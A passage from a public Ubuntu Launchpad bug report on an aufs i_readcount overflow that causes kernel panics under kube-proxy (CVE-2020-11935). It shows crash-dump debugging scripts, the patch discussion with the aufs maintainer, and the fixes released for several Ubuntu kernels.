      i_readcount.counter = 11247257
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 6511562
      i_readcount.counter = 5327637
      i_readcount.counter = 3551757
      i_readcount.counter = 1812946
      i_readcount.counter = 1775876
      i_readcount.counter = 1775876
      i_readcount.counter = 1775876
      i_readcount.counter = 1775875
      i_readcount.counter = 1775871
      i_readcount.counter = 1408817

Part 5) Really from aufs?

It's interesting to examine other aufs files used by the
kube-proxy container when running iptables-save/restore (as
they are opened as well, thus should also show the symptom.)

Obviously, /etc/protocols is accessed more often, as it's
the file for which i_readcount increased so much that has
overflown back to zero and triggered a crash.
(opened on a "per-iptables rule with port number" basis.)
But for the same reason, it's not 'large' anymore now.

So, let's look at other files used by iptables-save/restore
(and other programs), say the standard C library, libc.so,
which are thus expected have large i_readcount.

Part 5.1) crash scripting

The hash in the file path is an aufs branch/layer identifier,
which is referred to by the aufs superblock info structure:

/opt/k8s/docker/aufs/diff/7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558/etc/protocols

Now there is some crash scripting to navigate through the
aufs structures/specific fields while keeping pointers as
reference for their info, so that we can backtrack to use
the structures that lead us to a particular value later.

We want to find the aufs superblock with that branch hash.

Notes:

- struct super_block.s_fs_info (pointer to struct au_sbinfo)
- struct au_sbinfo.si_branch (array of pointers to struct au_branch, with si_bend elements)
- struct au_branch.br_path.dentry (pointer to dentry of that branch/layer in disk)
- struct dentry.d_name.name (string with the dentry's basename in disk)

Idea:

crash> < list-of-commands | tee list-of-commands-output | shell glue to generate more commands > list.of-commands.next

Therefore:

0) Load debuginfo for aufs kernel module:

crash> mod -s aufs /usr/lib/debug/lib/modules/4.4.0-133-generic/kernel/fs/aufs/aufs.ko

1) For each aufs superblock, output commands to print its super_block.s_fs_info (i.e., au_sbinfo pointer)

crash> mount | awk '/aufs/ { print "struct super_block.s_fs_info", $2 }' > crash.struct-sb-s_fs_info.script

2) For each au_sbinfo, output commands to print its si_bend (number of branches) and si_branch array pointer

crash> < crash.struct-sb-s_fs_info.script | tee crash.struct-sb-s_fs_info.output | awk '/s_fs_info =/ { print "struct au_sbinfo.si_bend,si_branch", $3 }' > crash.struct-au_sbinfo_bend_branch.script

3) For each si_branch array pointer, output commands to read its si_bend elements (i.e., si_branch pointers)

crash> < crash.struct-au_sbinfo_bend_branch.script | tee crash.struct-au_sbinfo_bend_branch.output | awk '/si_bend =/ { bend=$3 } /si_branch =/ { br=$3; print "rd -64", br, bend }' > crash.rd-64-si_branch-si_bend.script

4) For each si_branch, output commands to print its dentry (i.e., directory on disk used by this branch)

crash> < crash.rd-64-si_branch-si_bend.script | tee crash.rd-64-si_branch-si_bend.output | grep -v '^crash>' | cut -d: -f2- | grep -wo '[0-9a-f]\{16\}' | sed 's/^/struct au_branch.br_path.dentry /' > crash.au_br.br_path.dentry.script

5) For each dentry, output commands to print its name (i.e., name of the directory)

crash> < crash.au_br.br_path.dentry.script | tee crash.au_br.br_path.dentry.output | awk '/br_path.dentry =/ { print "struct dentry.d_name.name", $3 }' > crash.dentry-d_name-name.script

6) Ran those commands, and save the name of the directories.

crash> < crash.dentry-d_name-name.script > crash.dentry-d_name-name.output

Backtracking through the intermediary .output files
(which contain the command used to generate output)
from the branch directory we're after, up until its
superblock:

The branch hash is 7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558,
from the path:

/opt/k8s/docker/aufs/diff/7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558/etc/protocols

1) Find the dentry with that name:

$ grep -B1 7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558 crash.dentry-d_name-name.output
    crash> struct dentry.d_name.name 0xffff883f5d747b00
      d_name.name = 0xffff883f4e892b50 "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"

2) Find the au_branch with that dentry:

$ grep -B1 0xffff883f5d747b00 crash.au_br.br_path.dentry.output
    crash> struct au_branch.br_path.dentry ffff887f61fcc800
      br_path.dentry = 0xffff883f5d747b00

3) Find the au_branch array with that au_branch:

$ grep -B2 ffff887f61fcc800 crash.rd-64-si_branch-si_bend.output
    crash> rd -64 0xffff883f4dd773c0 0x4
    ffff883f4dd773c0:  ffff887f61fce600 ffff887f61fcc600   ...a.......a....
    ffff883f4dd773d0:  ffff887f61fcc700 ffff887f61fcc800   ...a.......a....

4) Find the au_sbinfo with that au_branch array:

$ grep -B2 0xffff883f4dd773c0 crash.struct-au_sbinfo_bend_branch.output
    crash> struct au_sbinfo.si_bend,si_branch 0xffff887f5ecdd000
      si_bend = 0x4
      si_branch = 0xffff883f4dd773c0

5) Find the super_block with that au_sbinfo:

$ grep -B1 0xffff887f5ecdd000 crash.struct-sb-s_fs_info.output
    crash> struct super_block.s_fs_info ffff883f63ee8800
      s_fs_info = 0xffff887f5ecdd000

6) And that super_block / mount is:

crash> mount | grep ffff883f63ee8800
    ffff887f5ecc7000 ffff883f63ee8800 aufs   none      /opt/bb/docker/aufs/mnt/7740aebe2a1a983b5b703067fc04455a33ce42942f6f930f426f62552a70b958

Part 5.2) Checking the libc.so dentry/inode
and its backing inode i_readcount value.

Navigating through the:
-> aufs superblock
-> root dentry -> subdirs
-> lib dentry -> subdirs
-> x86_64-linux-gnu dentry -> subdirs
-> libc-*.so dentry -> backing dentry/inode

- root dentry/subdirs:

crash> * super_block.s_root ffff883f63ee8800
      s_root = 0xffff883f61805140

crash> * -o dentry.d_subdirs 0xffff883f61805140
    struct dentry {
      [ffff883f618051e0] struct list_head d_subdirs;
    }

- lib dentry/subdirs:

crash> * dentry.d_inode^Cxffff887f510f9140
    crash> list -s dentry.d_name.name -l dentry.d_child -H ffff883f618051e0 | grep -B1 -w lib
    ffff887f4e423e90
      d_name.name = 0xffff887f4e423e38 "lib"

crash> * -o dentry.d_subdirs -l dentry.d_child ffff887f4e423e90
    struct dentry {
      [ffff887f4e423ea0] struct list_head d_subdirs;
    }

- x86_64-linux-gnu dentry/subdirs:

crash> list -s dentry.d_name.name -l dentry.d_child -H ffff887f4e423ea0 | grep -B1 x86_64-linux-gnu
    ffff887f4e420990
      d_name.name = 0xffff887f4e420938 "x86_64-linux-gnu"

crash> * -o dentry.d_subdirs -l dentry.d_child ffff887f4e420990
    struct dentry {
      [ffff887f4e4209a0] struct list_head d_subdirs;
    }

- libc-*.so file

crash> list -s dentry.d_name.name -l dentry.d_child -H ffff887f4e4209a0 | grep -B1 'libc-.*so'
    ffff887f4e75c090
      d_name.name = 0xffff887f4e75c038 "libc-2.24.so"

Checking its superblock matches the above: (yes)
and that its inode file operations is aufs (yes)s

crash> * dentry.d_sb -l dentry.d_child ffff887f4e75c090
      d_sb = 0xffff883f63ee8800

crash> * dentry.d_inode -l dentry.d_child ffff887f4e75c090
      d_inode = 0xffff887f4e768358

crash> * inode.i_fop 0xffff887f4e768358
      i_fop = 0xffffffffc02c1ce0 <aufs_file_fop>

Now, navigating through the aufs structures linked from
the dentry in aufs to the dentry/inode in the underlying
filesystem/disk.

The dentry.d_fsdata field points to:

- aufs struct au_dinfo (dentry info)

crash> * -x dentry.d_fsdata -l dentry.d_child ffff887f4e75c090
      d_fsdata = 0xffff887f4e75e000

Which points to an array of aufs struct au_hdentry (host/hard? dentry)

- aufs struct au_hdentry array pointed by au_dinfo.di_hdentry
(with di_bend+1 elements, of size 0x10)

crash> * -x au_dinfo.di_hdentry,di_bstart,di_bend 0xffff887f4e75e000
      di_hdentry = 0xffff887f50644000
      di_bstart = 0x4
      di_bend = 0x4

crash> * -x au_hdentry
    struct au_hdentry {
        struct dentry *hd_dentry;
        aufs_bindex_t hd_id;
    }
    SIZE: 0x10

And looking at elements until 0x4 (i.e, at offset 0x4*0x10)

crash> * -x au_hdentry.hd_dentry 0xffff887f50644000
      hd_dentry = 0x0
    crash> * -x au_hdentry.hd_dentry 0xffff887f50644010
      hd_dentry = 0x0
    crash> * -x au_hdentry.hd_dentry 0xffff887f50644020
      hd_dentry = 0x0
    crash> * -x au_hdentry.hd_dentry 0xffff887f50644030
      hd_dentry = 0x0
    crash> * -x au_hdentry.hd_dentry 0xffff887f50644040
      hd_dentry = 0xffff887f4e75c300

And this points to the dentry on the real filesystem.

crash> struct dentry.d_name.name 0xffff887f4e75c300
      d_name.name = 0xffff887f4e75c338 "libc-2.24.so"

And finally, looking at the backing inode:

crash> struct dentry.d_inode 0xffff887f4e75c300
      d_inode = 0xffff887f4e7701d0

crash> struct inode.i_readcount.counter 0xffff887f4e7701d0
      i_readcount.counter = 11247257

We can see it's fairly unbalanced towards a large number.

And it's the _TOP 3_ i_readcount value observed up above!
(which is expected, as libc is definitely opened often.)

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#13

aufs-intro-i_readcount_inc Edit (8.8 KiB, text/plain)

Analysis/history of the aufs change back in Linux v2.6.39.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#14

xfstests_aufs.patch Edit (5.1 KiB, text/plain)

Patch for xfstests-dev to use aufs with the overlayfs suite.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#15

I'm happy to send patches for Ubuntu releases if needed
(and Debian and aufs upstream, for that matter),

Just not yet aware which (private) mailing list/channel
should be used, and how/which coordination is required.

Mauricio Faria de Oliveira (mfo) on 2020-04-16

tags:

added: sts

Revision history for this message

J. R. Okajima (hooanon05) wrote on 2020-06-17:

#16

a.patch Edit (1.4 KiB, text/plain)

Mauricio,

Thank you for noticing me (as an upstream developer) and your thorough
analysis.
Your patch is good, but it didn't pass my local test. Because the test
has a case "branch manipulation: change the branch permission RW to RO."
The test is for an aufs specific feature which enables users to change
the permission of a branch (layer) dynamically. The one RW plus one or
more RO layers case is common, but users can have multiple RW layers and
change them into RO layers without unmounting aufs.

So I added another fix over yours and I am testing it now. It will take
several days.

Revision history for this message

J. R. Okajima (hooanon05) wrote on 2020-06-17: Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

#17

"J. R. Okajima":
> So I added another fix over yours and I am testing it now. It will take
> several days.

Ah, I should have written more.
"several days" in the above sentence means my regular test takes long
time. It doens't mean I can try your "multiple" parameter using kprobe
test. The test looks very effective, so if you can, please try it for
my patch in previous post. Obviously it does no harm unless you try
"mount -o remount,mod:/your/rw/branch=ro".

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-17:

#18

Hi J. R. Okajima,

Good point. I recall that code path to change branches to read-only.

It's not exercised in the several tests I've done (for most common
scenarios.) Thanks for the additional testing.

It was a strong suspect early on, because it changes the underlying
inode's open file mode to read-only, and then an unbalance happens:

because the file was opened in read-write mode (no i_readcount_inc),
and after changed to read-only, on close it has is i_readcount_dec.

I remember the code having warnings that IMA messages could happen
if that is done in aufs; and possibly for this exact reason/change.

I'm not an aufs expert, but I think it's still wrong for aufs to
mess with the file mode of an already open file in the underlying
filesystem, and trying to remedy the failure as a result of that
by messing with the readcount again, under the covers.

Maybe another approach is to close the file if opened in RW mode,
and reopen in RO mode? so that the VFS continues to take care of
the i_readcount value, and aufs doesn't have to play tricks here.

(not sure if that is possible, i don't remember how aufs keeps
the access/syscalls from users of that file; but maybe it is
worth looking at it. -- and if it's too hard to do/not makes
sense, then maybe messing with the i_readcount under the hood
is what works for the time being. :)

Hope this helps,
Mauricio

Revision history for this message

J. R. Okajima (hooanon05) wrote on 2020-06-17:

#19

Mauricio Faria de Oliveira:
> I'm not an aufs expert, but I think it's still wrong for aufs to
> mess with the file mode of an already open file in the underlying
> filesystem, and trying to remedy the failure as a result of that
> by messing with the readcount again, under the covers.

Aufs is an ordinaray filesystem which is a callee of VFS, at the same
time aufs is a caller of VFS for the branch/layer filesystems. So aufs
handles i_readcount on behalf of VFS.

> Maybe another approach is to close the file if opened in RW mode,
> and reopen in RO mode? so that the VFS continues to take care of
> the i_readcount value, and aufs doesn't have to play tricks here.

Re-open cannot be an option. It will destroy the file lock, file
position or any other file internal parameters.

J. R. Okajima

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-17:

#20

Right, I think see your point. Even though it's an ordinary filesystem
as a callee of VFS, it is not as a caller (since most filesystems don't
do that), and in this role, it might have to do non-ordinary things too.

Thanks for clarifying that re-open is not an option. I imagined these
attributes were kept at the aufs file, and that the underlying fs file
was not that related. (as I mentioned, I'm not an aufs expert, nor fs
expert, for that matter.)

In general, i_readcount_inc/dec() outside of VFS is likely not the
"right" thing to do, but this particular case is far from "general"
(given the operation: to change an entire branch/layer RW->RO; and
being an union/layer filesystem; and while files are still open.)

... so I guess there is the "doable" thing to do, right? :)

Thanks for the patch!

Revision history for this message

J. R. Okajima (hooanon05) wrote on 2020-06-19:

#21

Mauricio Faria de Oliveira:
> ... so I guess there is the "doable" thing to do, right? :)

Well, my local tests are still going on. If everything goes well, I'd
like to release this fix on next Monday (in my local timezone). If
security guys here want me to wait, let me know as soon as possible.

By the way, I've found there is a almost identical commit in aufs5
repositories.
1d26f910c53fa 2019-08-03 aufs: for v5.3-rc1, maintain i_readcount

J. R. Okajima

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-19:

#22

Hi J. R. Okajima,

> If security guys here want me to wait, let me know as soon as possible.

I'll mention that in the email thread we're all on.

Not sure if this is sufficient notice time for some,
as it's already weekend or really close on some TZs.

Hopefully it is, and the thinking is OK to release.

Revision history for this message

J. R. Okajima (hooanon05) wrote on 2020-06-19:

#23

Mauricio Faria de Oliveira:
> Not sure if this is sufficient notice time for some,
> as it's already weekend or really close on some TZs.

I see.
Then I'll wait a few more days.

J. R. Okajima

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-19:

#24

That should help; thank you!

Revision history for this message

Seth Arnold (seth-arnold) wrote on 2020-06-25:

#25

Please use CVE-2020-11935 for the reference count issue.

Thanks

Revision history for this message

J. R. Okajima (hooanon05) wrote on 2020-06-29: Fwd: aufs4 and aufs5 GIT release (v5.7)

#26

------- Forwarded Message

From: "J. R. Okajima" <email address hidden>
To: <email address hidden>
Subject: aufs4 and aufs5 GIT release (v5.7)
Date: Mon, 29 Jun 2020 10:32:38 +0900
Message-ID: <2412.1593394358@jrobl>

o news
- - linux-v5.7 is released. so is aufs5.7 branch.
aufs5.8-rcN is not started yet.

o bugfix
- - do not call i_readcount_inc(), reported and fixed by Mauricio Faria de
Oliveira.
- - related to above, fix IMA i_readcount.

J. R. Okajima

- ----------------------------------------
- - aufs4-linux.git
aufs: bugfix, IMA i_readcount
aufs: do not call i_readcount_inc()

- - aufs4-standalone.git
ditto

- - aufs5-linux.git
ditto

- - aufs5-standalone.git
ditto

- - aufs-util.git
nothing

------- End of Forwarded Message

Mauricio Faria de Oliveira (mfo) on 2020-06-29

Changed in linux (Ubuntu):
status:	New → In Progress
Changed in linux (Ubuntu Bionic):
status:	New → In Progress
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status:	New → Won't Fix
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Focal):
status:	New → In Progress
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Groovy):
status:	In Progress → Won't Fix
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu):
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)

Mauricio Faria de Oliveira (mfo) on 2020-06-29

description:	updated
description:	updated
description:	updated

Mauricio Faria de Oliveira (mfo) on 2020-06-29

Changed in linux (Ubuntu Eoan):
status:	Won't Fix → In Progress
description:	updated

Mauricio Faria de Oliveira (mfo) on 2020-06-29

description:

updated

Mauricio Faria de Oliveira (mfo) on 2020-06-29

description:

updated

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-06-29:

#27

[X/B/D/E][PATCH 0/2] aufs: fixes for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111578.html

[F/G/Unstable][PATCH 0/1] aufs: fix for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111581.html

Revision history for this message

Alex Murray (alexmurray) wrote on 2020-07-09:

#28

This is public in the Ubuntu CVE Tracker so making the bug public too.

information type:

Private Security → Public Security

Ubuntu Foundations Team Bug Bot (crichton) on 2020-07-09

tags:

added: patch

Mauricio Faria de Oliveira (mfo) on 2020-07-22

Changed in linux (Ubuntu Bionic):
status:	In Progress → Fix Released
Changed in linux (Ubuntu Focal):
status:	In Progress → Fix Released
Changed in linux (Ubuntu Xenial):
status:	New → Fix Released
importance:	Undecided → Medium
assignee:	nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status:	In Progress → Fix Committed

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-07-22:

#29

Marking as fix released for X/B/F on kernel packages versions:
- Xenial: 4.4.0-186.216
- Bionic: 4.15.0-112.113
- Focal: 5.4.0-42.46

Covered in USNs:
https://usn.ubuntu.com/4425-1
https://usn.ubuntu.com/4426-1
https://usn.ubuntu.com/4427-1

Revision history for this message

Brian Murray (brian-murray) wrote on 2020-08-18:

#30

The Eoan Ermine has reached end of life, so this bug will not be fixed for that release

Changed in linux (Ubuntu Eoan):
status:	Fix Committed → Won't Fix

Revision history for this message

Peter Burkholder (peterburkholder) wrote on 2020-10-21:

#31

This CVE still shows up as "Reserved" at https://nvd.nist.gov/vuln/detail/CVE-2020-11935 and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11935.

Is there an approval/publication step that y'alls still need to take?

Thanks, Peter

Revision history for this message

Seth Arnold (seth-arnold) wrote on 2020-10-21: Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

#32

On Wed, Oct 21, 2020 at 10:32:14PM -0000, Peter Burkholder wrote:
> Is there an approval/publication step that y'alls still need to take?

Yes, there is; it's been a busy, uh, three months give or take.

Thanks for the friendly reminder. :)

Mauricio Faria de Oliveira (mfo) on 2022-09-14

Changed in linux (Ubuntu):
status:	In Progress → Fix Released

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Patches

Add patch

Bug attachments

Add attachment

Remote bug watches

Bug watches keep track of this bug in other bug trackers.

Ubuntulinux package

kernel panic hit by kube-proxy iptables-save/restore caused by aufs

Bug Description

CVE References

Other bug subscribers

Patches

Bug attachments

Remote bug watches

Ubuntu
linux package